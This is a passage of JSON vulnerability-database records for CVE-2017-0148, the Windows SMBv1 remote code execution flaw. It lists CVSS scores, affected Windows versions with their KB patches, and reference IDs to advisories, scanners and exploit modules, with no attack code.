"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:45:32", "differentElements": ["msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T10:45:12", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4013198", "KB4012213", "KB3205409", "KB4012598", "KB4012216", "KB4012217", "KB4012212", "KB3177186", "KB3210720", "KB3213986", "KB3205401", "KB4012606", "KB3210721", "KB4013429", "KB4012215", "KBMS16-110, 3187754", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:45:12", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T18:58:50", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3205409", "KB4012216", "KB3213986", "KB3212646", "KB4012213", "KB3210720", "KB4013429", "KB4012606", "KB4012214", "KBMS16-110, 3187754", "KB4012217", "KB4012215", "KB4013198", "KB3177186", "KB3210721", "KB4012598", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 